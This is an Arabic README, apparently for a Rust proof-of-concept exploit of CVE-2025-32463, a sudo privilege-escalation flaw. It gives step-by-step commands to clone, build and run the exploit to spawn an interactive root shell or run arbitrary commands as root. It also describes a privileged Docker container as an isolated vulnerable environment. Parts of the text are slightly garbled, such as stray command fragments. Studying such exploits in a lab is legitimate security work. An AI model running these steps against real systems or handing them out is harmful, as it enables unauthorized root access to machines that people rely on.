
أداة إثبات مفهوم مكتوبة بلغة Rust لثغرة CVE-2025-32463، وهي ثغرة تصعيد امتيازات في Sudo. تقوم بتشغيل شل جذر تفاعلي أو تنفيذ أوامر عشوائية كجذر.
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
./exploit
git clone https://github.com/krypton-0x00/CVE-2025-32463-Chwoot-POC.git
cd CVE-2025-32463-Chwoot-POC
cargo build --release
سيكون الثنائي المُجمَّع موجودًا في المسار التالي:
./target/release/CVE-2025-32463-Chwoot-POC
شغِّل الثنائي الاستغلالي مع وسائط الأوامر الاختيارية:
sudo ./target/release/CVE-2025-32463-Chwoot-POC
id):sudo ./target/release/CVE-2025-32463-Chwoot-POC "id"
بدلاً من ذلك، استخدم حاوية Docker المتوفرة لبيئة ضعيفة معزولة مع جميع التبعيات المثبتة.
docker build -t sudo-chwoot .
sudo docker images)docker run --rm -it --privileged sudo-chwoot
cd /home/pwn/CVE-2025-32463-Rust-POC
./target/release/CVE-2025-32463-Chwoot-POC